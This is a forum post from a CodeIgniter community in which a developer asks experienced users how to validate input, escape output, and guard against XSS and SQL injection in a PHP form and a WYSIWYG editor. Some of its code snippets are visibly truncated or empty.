Welcome Guest, Not a member yet? Register   Sign In
Are you sure about handling SECURITY?!

Hi to all developers...

NOTICE! Dear developer... If you're tired or has no sufficient time to read this, please skip it for now and come back later! We would try to this post be a good and complete reference about the repetitive and not complete issue... input and output security.

I know there were some posts about this issue and I read almost all of them. But I think there are still some misunderstanding about security issue and how handling it.

Suppose I prepare a form for collecting info about users, like their name, job, state, username, password and etc. let's consider one:

PHP Code:
<?php echo form_open('user/complete_info'); ?>

   <input type="text" name="first_name" value="<?= set_value('first_name'); ?>" placeholder="enter your first name"/>
   <!-- other inputs -->

   <button type="submit" name="complete_info">Send</button>
<?php echo form_close(); ?>

Now the user insert something in this input and assume submit it. Now in controller:
    1. I filter or validate input (as @mwhitney frequently mentioned filter (validate) input, escape output )
PHP Code:

As you see, I validate input via regex and allow just a-z and A-Z chars. (also for now, the user can insert [ and ] and I could not handle this issue!)

    2. If the input is valid, I will be store it into database.

PHP Code:
if($this->form_validation->run() === FALSE){
   //some codes and return to form

} else{
   $info = array(
     'first_name'     => $this->input->post('first_name')
//other inputs
   $db_result $this->User_model->insert_user_info($info);
   //some codes

PHP Code:
public function insert_user_info($info){
$this->db->affected_rows() > 0){
   } else{

In exists post and their replies, some developer said:
  • Use php build-in filter data type functions
  • Escape via html_escape() or htmlspecialchars()
  • HTML Purifier classes
  • Escape queries before inserting in database
  • ...
Q1. Now that I do filter inputs via regex, for strings, for numbers or... and could accept just defined chars, ex. alphabets for name, numbers for zip code, alphabets and numbers for username and more, should I use first 3 mentioned options for filtering and encoding inputs?

Q2. Now that I used CI 3 Query Builders, Should I escape my queries?

After I handle these, user can see completed info in his/her panel. Now first, I must retrieve and read info from database, the info are input (as @mwhitney mentioned here) and the output is HTML code that sent to user browser, user panel.

Q3. How could I handle this properly? Just retrieve them and put in xss_clean() function and the result pass to view file? Or use htmlspecialchars()? Or some other approach?
Q4. As @mwhitney said, now the input is read info from db, so how could validate them as inputs?

Suppose I prepare a simple WYSIWYG editor for users and accept some basic tags, in this situation what should I do? As you know, some these editors (like CKEditor) would encode some chars, but I know I must validate them on server-side.

Q5. How do this? Just use htmlspecialchars or xss_clean() or it's better to user HTML Purifier classes? Or some other actions?

I, as an admin, prepare some posts with a world of tags! and stored them into database in order to allow some users read them. What about this situation?
Some developers said about filtering and validating http_request, urls that redirect to them or other foreign input. Is it possible to discuss about these and give practical example?
* As I said, I use latest version of CI.
* I enable CSRF too.
* I know about OWASP  and see it quickly and will read more.
Thanks to all experts for arrived to this line Smile and want to share info. If you could explain more and in details in order to reference other issues to this post in the future.

Messages In This Thread
Are you sure about handling SECURITY?! - by pb.sajjad - 07-15-2016, 06:52 AM

Theme © iAndrew 2016 - Forum software by © MyBB